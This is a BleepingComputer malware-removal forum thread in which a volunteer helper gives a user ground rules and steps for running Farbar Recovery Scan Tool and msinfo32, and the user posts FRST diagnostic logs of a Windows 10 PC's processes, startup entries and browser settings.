2016-01-03 13:03 - 2016-01-03 13:03 - 00000000 ____D C:\Program Files\iPod
2016-01-03 13:03 - 2016-01-03 13:03 - 00000000 ____D C:\Program Files (x86)\iTunes
2016-01-03 13:00 - 2016-01-03 13:00 - 00001921 _____ C:\Users\Public\Desktop\QuickTime Player.lnk
2016-01-03 13:00 - 2016-01-03 13:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime
2016-01-03 13:00 - 2016-01-03 13:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud
2016-01-03 13:00 - 2016-01-03 13:00 - 00000000 ____D C:\Program Files (x86)\QuickTime
2016-01-03 12:59 - 2016-01-03 12:59 - 00000000 ____D C:\Users\sesay\AppData\Roaming\WildTangent
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-01-27 17:53 - 2015-08-16 21:31 - 00000000 ____D C:\Users\sesay\AppData\Roaming\Skype
2016-01-27 17:46 - 2015-11-08 19:36 - 00000930 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-01-27 17:46 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-01-27 17:46 - 2015-08-16 16:54 - 00000000 ____D C:\Users\sesay\AppData\Local\Packages
2016-01-27 16:47 - 2015-08-16 20:00 - 00001137 _____ C:\Users\sesay\Desktop\nativelog.txt
2016-01-27 15:46 - 2015-11-08 19:36 - 00000926 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-01-27 15:11 - 2015-10-30 02:11 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-01-27 11:39 - 2015-12-23 09:06 - 00000000 ____D C:\Users\sesay\AppData\Local\Screencast-O-Matic-v2
2016-01-27 11:34 - 2015-11-17 17:45 - 00000000 ____D C:\Program Files (x86)\Steam
2016-01-27 11:28 - 2015-10-30 02:24 - 00000000 ___HD C:\Program Files\WindowsApps
2016-01-27 11:24 - 2015-08-16 16:58 - 00000000 ____D C:\Users\sesay\Documents\Youcam
2016-01-27 11:22 - 2015-12-07 03:53 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2016-01-27 11:22 - 2015-08-16 16:57 - 00000000 ___RD C:\Users\sesay\OneDrive
2016-01-27 11:22 - 2015-08-16 16:54 - 00000000 __SHD C:\Users\sesay\IntelGraphicsProfiles
2016-01-26 21:52 - 2015-11-17 17:56 - 00000000 ____D C:\Users\sesay\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2016-01-26 20:01 - 2015-08-16 17:00 - 00000000 ____D C:\Users\sesay\AppData\Roaming\.minecraft
2016-01-26 14:10 - 2015-08-16 21:31 - 00000000 ____D C:\ProgramData\Skype
2016-01-25 17:26 - 2015-09-01 18:47 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-01-25 17:25 - 2015-09-01 18:47 - 00000000 ____D C:\Program Files\Java
2016-01-25 17:21 - 2015-08-16 17:03 - 00000000 ____D C:\Users\sesay\AppData\Roaming\InstallShield Installation Information
2016-01-25 17:20 - 2015-11-26 21:57 - 00000000 ____D C:\ProgramData\SkySaga Infinite Isles
2016-01-25 17:19 - 2015-02-11 23:22 - 00000000 ____D C:\ProgramData\Package Cache
2016-01-25 17:18 - 2015-10-30 02:21 - 00000000 ____D C:\WINDOWS\INF
2016-01-23 17:26 - 2015-12-18 19:47 - 00000000 ____D C:\Users\sesay\AppData\Local\Gameo
2016-01-23 14:49 - 2015-11-08 19:35 - 00000000 ____D C:\Users\sesay\AppData\Local\Google
2016-01-22 15:50 - 2015-11-08 19:36 - 00002355 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-01-22 15:50 - 2015-11-08 19:36 - 00002343 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-01-22 15:20 - 2015-09-01 18:47 - 00000000 ____D C:\Users\sesay\.oracle_jre_usage
2016-01-22 11:50 - 2015-12-07 03:53 - 00012493 _____ C:\WINDOWS\system32\Drivers\rtkhdasetting.zip
2016-01-22 11:50 - 2015-12-07 03:53 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2016-01-21 11:19 - 2015-09-01 18:47 - 00000000 ____D C:\ProgramData\Oracle
2016-01-21 11:18 - 2015-09-01 18:47 - 00110176 _____ (Oracle Corporation) C:\WINDOWS\system32\WindowsAccessBridge-64.dll
2016-01-21 08:51 - 2015-10-30 02:24 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2016-01-21 08:48 - 2015-08-18 20:17 - 00000000 ____D C:\Program Files\Microsoft Office 15
2016-01-15 00:24 - 2015-08-14 18:25 - 03309264 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkApi64.dll
2016-01-15 00:24 - 2015-08-14 18:25 - 03075784 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RltkAPO64.dll
2016-01-15 00:24 - 2015-08-14 18:25 - 00950600 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SEHDRA64.dll
2016-01-15 00:24 - 2015-08-14 18:25 - 00731088 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SECOMN64.dll
2016-01-15 00:24 - 2015-08-14 18:25 - 00461272 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SEAPO64.dll
2016-01-15 00:24 - 2015-08-14 18:25 - 00203432 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkCfg64.dll
2016-01-15 00:20 - 2015-08-14 18:24 - 04695288 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\Drivers\RTKVHD64.sys
2016-01-15 00:20 - 2015-08-14 18:24 - 00032392 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkCoLDR64.dll
2016-01-14 23:37 - 2015-12-07 06:46 - 00000000 ____D C:\Windows.old
2016-01-14 08:39 - 2015-12-07 03:57 - 00972104 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-01-14 08:35 - 2015-12-07 04:20 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-01-13 23:10 - 2015-08-16 16:52 - 00016764 _____ C:\bdlog.txt
2016-01-13 23:09 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\system32\appraiser
2016-01-13 23:05 - 2015-09-16 18:55 - 00000000 ___RD C:\Users\sesay\3D Objects
2016-01-13 21:43 - 2015-08-16 18:55 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-01-13 21:40 - 2015-08-16 18:55 - 143671360 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-01-13 21:31 - 2015-08-16 21:31 - 00000000 ___RD C:\Program Files (x86)\Skype
2016-01-03 13:09 - 2015-12-06 19:46 - 00000000 ____D C:\Users\sesay\AppData\Local\Apple Computer
2016-01-03 13:03 - 2015-12-06 19:45 - 00000000 ____D C:\Program Files\Common Files\Apple
2016-01-02 20:40 - 2015-10-30 02:26 - 00826872 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2016-01-02 20:40 - 2015-10-30 02:26 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2015-12-30 15:30 - 2015-12-07 03:57 - 00000000 ____D C:\Users\hakim
 
==================== Files in the root of some directories =======
 
2015-08-16 12:09 - 2015-08-16 12:09 - 0509256 _____ () C:\ProgramData\1439744800.bdinstall.bin
 
Some files in TEMP:
====================
C:\Users\sesay\AppData\Local\Temp\jre-8u66-windows-au.exe
C:\Users\sesay\AppData\Local\Temp\jre-8u71-windows-au.exe
 

==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 

ATTENTION: ==> Could not access BCD. The user is not administrator
 
==================== End of FRST.txt ============================

 
 
Thank you very much

Edited by Oh My!, 29 January 2016 - 07:02 PM.



#2 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 37,957 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:10:42 PM

Posted 29 January 2016 - 07:01 PM

Greetings Alban18 and welcome to BleepingComputer's Virus/Trojan/Spyware/Malware Removal forum.

My name is Oh My! and I am here to help you! Now that we are "friends" please call me Gary.

If you would allow me to call you by your first name I would prefer to do that.

===================================================

Ground Rules:
  • First, I would like to inform you that most of us here at Bleeping Computer offer our expert assistance out of the goodness of our hearts. Please try to match our commitment to you with your patience toward us. If this was easy we would never have met.
  • Please do not run any tools or take any steps other than those I will provide for you while we work on your computer together. I need to be certain about the state of your computer in order to provide appropriate and effective steps for you to take. Most often "well intentioned" (and usually panic driven!) independent efforts can make things much worse for both of us. If at any point you would prefer to take your own steps please let me know, I will not be offended. I would be happy to focus on the many others who are waiting in line for assistance.
  • Please perform all steps in the order they are listed in each set of instructions. Some steps may be a bit complicated. If things are not clear, be sure to stop and let me know. We need to work on this together with confidence.
  • Please copy and paste all logs into your post unless directed otherwise. Please do not re-run any programs I suggest. If you encounter problems simply stop and tell me.
  • When you post your reply, use the Reply Topic button instead.
  • In the upper right hand corner of the topic you will see the Follow Topic button. Click on this then choose Immediate E-Mail notification and then Proceed and you will be sent an email once I have posted a response.
  • If you do not reply to your topic after 5 days we assume it has been abandoned and I will close it.
  • When your computer is clean I will alert you of such. I will also provide for you detailed information about how you can combat future infections.
  • I would like to remind you to make no further changes to your computer unless I direct you to do so.
===================================================

Now that I am assisting you, you can expect that I will be very responsive to your situation. If you are able, I would request you check this thread at least once per day so that we can try to resolve your issues effectively and efficiently. If you are going to be delayed please be considerate and post that information so that I know you are still with me. Unfortunately, there are many people waiting to be assisted and not enough of us at BleepingComputer to go around. I appreciate your understanding and diligence.

Thank you for your patience thus far.

Please do this.

===================================================

Farbar Recovery Scan Tool (FRST)

--------------------
  • Delete your existing copy of FRST.exe
  • Download Farbar Recovery Scan Tool for either 32 bit or 64 bit systems and save it to your desktop <<< Important
  • If you are unsure if you have 32 bit or 64 bit simply download and try one. If that doesn't run properly the other one should
  • Right click the icon and select Run as administrator
  • Click Yes to the disclaimer
  • Make sure the Addition.txt box is checked
  • Click Scan and allow the program to run
  • Click OK on the Scan complete screen, then OK on the Addition.txt pop up screen
  • 2 Notepad documents should now be open on your desktop.
  • Please copy and paste the contents of both in your reply
===================================================

System Summary Information

--------------------
  • Press the Windows key + R on your keyboard at the same time
  • Type msinfo32 and press Enter
  • Left click on System Summary
  • Click File, Save, and name the file Summary
  • Zip and attach the file to your reply
===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it.
  • FRST results
  • Addition log
  • System Summary Information

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#3 Alban18

Posted 31 January 2016 - 01:14 PM

Sorry for the late response, I'll make sure to check this every day from now.

I will do this task when I go to my uncle's house today.



#4 Oh My!

Posted 31 January 2016 - 03:44 PM

Thanks.
Gary
 

#5 Alban18

Posted 31 January 2016 - 08:27 PM

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:27-01-2016
Ran by MuhammadAkim (administrator) on BASEMENT-PC (31-01-2016 19:56:24)
Running from C:\Users\sesay\Desktop
Loaded Profiles: MuhammadAkim & abang & sesay (Available Profiles: MuhammadAkim & abang & sesay & hakim)
Platform: Windows 10 Home Version 1511 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Edge)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2015\vsserv.exe
(Softex Inc.) C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe
(Intel Corporation) C:\Windows\SysWOW64\SET8596.tmp
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Broadcom Corporation.) C:\Windows\System32\BtwRSupportService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2015\updatesrv.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(WildTangent) C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
() C:\Program Files\Hewlett-Packard\SimplePass\opvapp.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2015\bdagent.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2015\bdwtxag.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.WindowsStore_2015.25.24.0_x64__8wekyb3d8bbwe\WinStore.Mobile.exe
(Microsoft Corporation) C:\Windows\System32\LogonUI.exe
(Microsoft Corporation) C:\Windows\System32\LockAppHost.exe
() C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersServer.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
() C:\Program Files\Hewlett-Packard\SimplePass\opvapp.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
(Microsoft Corporation) C:\Windows\System32\browser_broker.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2015\bdagent.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2015\bdwtxag.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\CSISYNCCLIENT.EXE
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe
() C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Hi-Rez Studios) C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8790264 2016-01-15] (Realtek Semiconductor)
HKLM\...\Run: [Bdagent] => C:\Program Files\Bitdefender\Bitdefender 2015\bdagent.exe [1603544 2015-11-11] (Bitdefender)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [170256 2015-12-17] (Apple Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-10-02] (Apple Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [596528 2015-12-22] (Oracle Corporation)
HKU\S-1-5-21-1436452318-2580999886-2786755032-1001\...\Run: [Bitdefender Wallet Agent] => C:\Program Files\Bitdefender\Bitdefender 2015\bdwtxag.exe [790880 2015-11-11] (Bitdefender)
HKU\S-1-5-21-1436452318-2580999886-2786755032-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [50615936 2016-01-18] (Skype Technologies S.A.)
HKU\S-1-5-21-1436452318-2580999886-2786755032-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3013712 2015-12-14] (Valve Corporation)
HKU\S-1-5-21-1436452318-2580999886-2786755032-1001\...\Run: [GoogleChromeAutoLaunch_0635AB9B70CF1FCB8E6453354609F798] => C:\Users\MuhammadAkim\AppData\Local\Chromium\Application\chrome.exe [667136 2015-08-11] (The Chromium Authors)
HKU\S-1-5-21-1436452318-2580999886-2786755032-1001\...\RunOnce: [Uninstall C:\Users\MuhammadAkim\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\MuhammadAkim\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64"
HKU\S-1-5-21-1436452318-2580999886-2786755032-1002\...\Run: [Bitdefender Wallet Agent] => C:\Program Files\Bitdefender\Bitdefender 2015\bdwtxag.exe [790880 2015-11-11] (Bitdefender)
HKU\S-1-5-21-1436452318-2580999886-2786755032-1002\...\RunOnce: [Uninstall C:\Users\abang\AppData\Local\Microsoft\OneDrive\17.3.6201.1019_1\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\abang\AppData\Local\Microsoft\OneDrive\17.3.6201.1019_1\amd64"
HKU\S-1-5-21-1436452318-2580999886-2786755032-1002\...\RunOnce: [Uninstall C:\Users\abang\AppData\Local\Microsoft\OneDrive\17.3.6201.1019_1] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\abang\AppData\Local\Microsoft\OneDrive\17.3.6201.1019_1"
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\...\Run: [Bitdefender Wallet Agent] => C:\Program Files\Bitdefender\Bitdefender 2015\bdwtxag.exe [790880 2015-11-11] (Bitdefender)
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\...\Run: [Gameo] => C:\Users\sesay\AppData\Roaming\Gameo\gameo.exe [42482176 2015-07-04] ()
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\...\Run: [GoogleChromeAutoLaunch_F360403BC2EC98CA32D7EC0F47FB7B5E] => C:\Users\sesay\AppData\Local\Chromium\Application\chrome.exe [667136 2015-08-11] (The Chromium Authors)
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\...\Run: [NowUSeeIt Player] => "C:\Program Files (x86)\NowUSeeItPlayer\NowUSeeItPlayer.exe" /autostart=1
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\...\Run: [msnmsgr] => "C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe" /background
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\...\RunOnce: [Uninstall C:\Users\sesay\AppData\Local\Microsoft\OneDrive\17.3.6201.1019_1\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\sesay\AppData\Local\Microsoft\OneDrive\17.3.6201.1019_1\amd64"
ShellIconOverlayIdentifiers: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX64.dll No File
ShellIconOverlayIdentifiers: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX64.dll No File
ShellIconOverlayIdentifiers: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX64.dll No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX32.dll No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX32.dll No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX32.dll No File
Startup: C:\Users\sesay\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Curse.lnk [2016-01-21]
ShortcutTarget: Curse.lnk -> C:\Users\MuhammadAkim\AppData\Roaming\Curse Client\Bin\Curse.exe (No File)
Startup: C:\Users\sesay\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MEGAsync.lnk [2016-01-22]
ShortcutTarget: MEGAsync.lnk -> C:\Users\MuhammadAkim\AppData\Local\MEGAsync\MEGAsync.exe (No File)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{7a5d4b11-e3c0-473f-8cb1-6ef96b29487a}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{ec741dab-2cfc-4a75-94f0-0a77b7af259e}: [DhcpNameServer] 192.168.1.1
 
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-1436452318-2580999886-2786755032-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-1436452318-2580999886-2786755032-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://mystart.toshiba.com/
HKU\S-1-5-21-1436452318-2580999886-2786755032-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/p/?LinkId=619797&pc=UE01&ocid=UE01DHP
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://g.live.com/1rewlive4startup/home
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_omxmedia_15_52_ssg03&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzz0CyDtCyByD0B0A0B0DtN0D0Tzu0StCyEyDtCtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StD0Fzy0FyBzy0DzztGyE0F0F0CtGtByDtD0EtGyByC0F0EtGtCzyyEtDtB0AtDyEtDtByEyD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzzyCzz0FyCtA0D0CtG0Bzz0E0BtGyE0D0B0EtGzzyEtCzztGyEtC0ByB0A0ByB0CyCyDtA0E2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtBzyyB%26cr%3D2082660329%26a%3Dwbf_omxmedia_15_52_ssg03%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_omxmedia_15_52_ssg03&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzz0CyDtCyByD0B0A0B0DtN0D0Tzu0StCyEyDtCtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StD0Fzy0FyBzy0DzztGyE0F0F0CtGtByDtD0EtGyByC0F0EtGtCzyyEtDtB0AtDyEtDtByEyD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzzyCzz0FyCtA0D0CtG0Bzz0E0BtGyE0D0B0EtGzzyEtCzztGyEtC0ByB0A0ByB0CyCyDtA0E2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtBzyyB%26cr%3D2082660329%26a%3Dwbf_omxmedia_15_52_ssg03%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKLM -> {29DAFA99-4299-408B-A085-18B288E65C09} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us1-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKLM-x32 -> {29DAFA99-4299-408B-A085-18B288E65C09} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us1-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
